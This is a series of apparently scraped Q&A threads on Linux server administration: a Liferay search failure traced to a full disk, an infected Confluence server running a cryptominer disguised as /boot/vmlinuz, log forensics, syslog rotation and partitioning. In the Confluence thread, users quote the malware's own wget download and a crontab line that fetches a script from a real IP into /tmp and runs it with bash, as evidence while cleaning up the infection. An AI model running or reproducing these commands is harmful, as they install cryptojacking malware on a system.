I am using Liferay-Portal-6.0.6 on which I have developed an Intranet platform for my organization.
User authentication and import is done using LDAP (AD Integration).
There is a case where one user, which is active and available in Users section in control panel, is not displayed in the search results of the search portlet. All the users can be search but this one.
Does anyone have any idea why this could be happening? If yes, then please provide help.
P.S.- The search portlet is not modified using Hooks or Exts. It is the default out of the box portlet that Liferay provides.
You can use Luke browser https://code.google.com/p/luke/ to view the lucene index created by Liferay and discover how the particular user is stored.
Maybe this strange user is indexed in a way you dont think and understand the context.
After a long research and fine look I found a solution.
My liferay instance is connected to a SOLR server which handles all the indices. I checked my SOLR server's memory and found that threshhold memory was full.
I used the following command and got the following result -
[root#ze42-v-zlapp02 bin]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/VolGroup00-lv_root
227G 227G 0G 100% /
/dev/sda1 99M 18M 77M 19% /boot
tmpfs 3.9G 0 3.9G 0% /dev/shm
I found out that the logs that SOLR was generating flooded the server memory. So I implemented the following steps in order to mitigate the issue -
Stop the liferay tomcat server
Stop SOLR server
Delete the log files in SOLR-tomcat/logs folder
Clear the catalina.out using cat /dev/null > catalina.out. P.S.- do not delete catalina.out
Start SOLR server
Go to SOLR console http://yoursolrIP:port/solr/admin/logging and set all secondary log levels to INFO
Start your liferay server
I also implemented a old log deletion script and added it to a cron job. Now only the last 10 days log is stored in my case and older is deleted automatically as per the cron job.
Your own answer is only a temporary solution. Best practise would be to implement logrotate. This is done on the OS Level, so any of your Sysadmins should be able to do that for you. If you have to do it yourself, here is a link which describes how to enable logrotate on a RHEL5 System. http://www.sysarchitects.com/logrotate_for_solr
As the implementation of logrotate can vary on different OS'es, I can not provide any further information ;)
Related
I'm running a Jira and a Confluence instance (and nginx reverse proxy) on a VPS. Currently, I can't start the confluence for some reason and I think this is a consequence of something else.
I've checked the process list:
The confluence user running the /boot/vmlinuz process and it eats the CPU. If I kill -9 this process it starts again a few seconds later.
After reboot the VPS:
Confluence and Jira started automatically.
Confluence is running a few seconds correctly then something kills the process. The Jira process is still running.
The /boot/vmlinuz process starts.
I've removed the Confluence from the automatic start, but it doesn't matter.
So my questions:
What is this /boot/vmlinuz process? I never saw this. (Yes I know, the vmlinuz is the kernel)
Why is starting over and over again and runs on 100% CPU?
What should I do to get back the normal behavior and may I start the Confluence?
Thanks any for answer
UPDATE
It caused by a hack. If you find a /tmp/seasame file, your server is infected. It uses the cron to download this file. I've removed the files in the /tmp folder, killed all the processes, disabled the cron for the confluence user, and updated the Confluence.
Your server looks like hacked.
Please take a look on process list closely.
e.g. run ps auxc and take a look on process binary sources.
You can use tools like rkhunter to scan your server but in general you should at the beginning kill everything that has been lunched as confluence user, scan your server/account, upgrade your confluence (in most cases user determinate source of attack), and look in your confluence for additional accounts etc.
Is you would like to see what is in that process, take a look on /proc e.g. in ls -la /proc/996. You will see source binary there too. You can also lunch strace -ff -p 996 to see what process is doing or cat /proc/996/exe | strings to see what strings that binary have. This is probably some kind of botnet part, miner etc.
I had same problem, it was hacked, the virus script was at /tmp, find the script name from command "top" (insignificance letters,name of "fcbk6hj" was mine. )and kill the processes(maybe 3 processes)
root 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKgl
root 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHl
root 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
kill all of them and delete /tmp/prot, and kill the process of /boot/vmlinuz, CPU's back.
I found that virus had dowloaded script to /tmp automatically, my method was mv wgetak to other name.
Virus behavious:
wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
found following task was written in crontab, just delete it:
*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
After remove this from system and crontab, maybe is good idea (at least for now) to add confluence user to /etc/cron.deny.
And after:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information
I met same question too at the same time,maybe it is a confluence bug. I just kill confluence process,the it got alright.
As you found out, this is malware — actually cryptojacking malware, intended to use your CPU as a cryptocurrency miner.
Your server has very likely been compromised because of a Confluence vulnerability (see first answer of this reddit post), however one should know that this is NOT ITS ONLY WAY OF PROPAGATION — this can't be emphasize enough. As a matter of fact a server of mine has been compromised as well although it doesn't run Confluence (I don't even know this software…), and the so-called /boot/vmlinuz process was ran by root.
Also, beware that this malware tries to propagate through SSH using known_hosts and SSH keys, so you should check other computers you accessed from this server.
Finally, the reddit post links to this comprehensive description of this malware, which is worth a read.
NB : Don't forget to send a report to the IP's ISP abuse email address.
I am performing Forensic analysis on Host based evidence - examining partitions of a hard drive of a server.
I am interested in finding the processes all the "users" ran before the system died/rebooted.
As this isn't live analysis I can't use ps or top to see the running processes.
So, I was wondering if there is a log like /var/log/messages that shows me what processes users ran.
I have gone through a lot of logs in /var/log/* - they give me information about logins, package updates, authorization - but nothing about the processes.
If there was no "command accounting" enabled, there is no.
Chances to find something are not too big, anyway a few things to consider:
depends how gracefull death/reboot was (if processes were killed gracefully, .bash_history and similar files may be updated with recent session info)
utmp and wtmp files may give the list of active users at the reboot.
OS may be saving crash dump (depends on linux distribution). If so - You may be able to examine OS state at the moment of crash. See RedHat's crash for details (http://people.redhat.com/anderson/crash_whitepaper/).
/tmp, /var/tmp may hold some clues, what was running
any files with mtime and ctime timestamps (maybe atime also) near the time of crash
maybe You can get something usefull from swap partition (especially if reboot was related to heavy RAM usage).
So, I was wondering if there is a log like /var/log/messages that
shows me what processes users ran
Given the OS specified by the file system path of /var/log, I am assuming you are using ubuntu or some linux based server and if you are not doing live forensics while the box was running or memory forensics (where a memory capture was grabbed), AND you rebooted the system, there is no file within /var/log that will attribute processes to users. However, if the user was using the bash shell, then you could check the .bash_history file that shows the commands that were run by that user which I think is 500 (by default for the bash shell).
Alternatively, if a memory dump was made (/dev/mem or /dev/kmem), then you could used volatility to pull out processes that were run on the box. But still, I do not think you could attribute the processes to the users that ran them. You would need additional output from volatility for that link to be made.
I am using syslog on an embedded Linux device (Debian-arm) that has a relatively smaller storage (~100 MB storage). If we assume the system will be up for 30 years and it logs all possible activities, would there be a case that the syslog fills up the storage memory? If it is the case, is syslog intelligent enough to remove old logs as there would be less space on the storage medium?
It completely depends how much stuff gets logged, but if you only have ~100MB, I would imagine that it's certainly likely that your storage will fill up before 30 years!
You didn't say which syslog server you're using. If you're on an embedded device you might be using the BusyBox syslogd, or you may be using the regular syslogd, or you may be using rsyslog. But in general, no syslog server rotates log files all by itself. They all depend on external scripts run from cron to do it. So you should make sure you have such scripts installed.
In non-embedded systems the log rotation functionality is often provided by a software package called logrotate, which is quite elaborate and has configuration files to say how and when which log files should be rotated. In embedded systems there is no standard at all. The most common configuration (especially when using BusyBox) is that logs are not written to disk at all, only to a memory ring buffer. The next most common configuration is idiosyncratic ad-hoc scripts built and installed by the embedded system integrator. So you just have to scan the crontabs and see if you can see anything that's configured to be invokes that looks like a log rotater.
in the linux bible book, i've found that it will be useful to install linux on different partitions; for example separating /var will be benefinc to avoid that an attacker will fill the hard drive and stops the OS (since the page will be in (/var/www/), and letting the application which is in /usr running, (nginx for example) how can we do this?
am sorry for that question, because am new in linux system, when i've tried the first time to load another partition (the d: in windows), it asked me to mount it first (i've made a shortcut to a document in the d: and the shortcut dont work untill i mount the partition), so does it make sense to make 5 partitions (/boot, /usr, /var, /home, /tmp) to load the OS?
do the web hosters make the same strategy?
even you divide the partitions.
Attacker can fill the logs and make the web service unstable. Which mostly or defaultly located in /var/log folder. Some distros even log folder in /etc/webserver/log folder.
there are some uploading related flaws that made php upload features fill up the file limit on tmp folder.
This will not protect you at all. You must look the security from another perspective.
Application scenario:
I have the (normal/permanent) /var/log mounted on an encrypted partition (/dev/LVG/log). /dev/LVG/log is not accessible at boot time, it needs to be manually activated later by su from ssh.
A RAM drive (using tmpfs) is mounted to /var/log at init time (in rc.local).
Once /dev/LVG/log is activated, I need a good way of appending everything in the tmpfs to /dev/LVG/log, before mounting it as /var/log.
Any recommendations on what would be a good way of doing so? Thanks in advance!
The only thing you can do is block until you somehow verify that /var/log is mounted on an encrypted VG, or queue log entries until that happened if your app must start on boot, which could get kind of expensive. You can't be responsible for every other app on the system and I can't see any reason to encrypt boot logs.
Then again, if you know the machine has heap to spare, a log queue that flushed once some event said it was OK to write to disk would seem sensible. That's no more expensive than the history that most shells keep, as long as you take care to avoid floods of events that could fill up the queue.
This does not account for possible log loss, but could with a little imagination.
There is a risk you could lose logging. You might want to try and write your logs to a file in /tmp which is tmpfs and thus in memory. You could then append the content to your encrypted volume and then remove the file in tmp. Of course if your machine failed to boot and went down again tmp would be erased and so you'd lose a good way of working out why.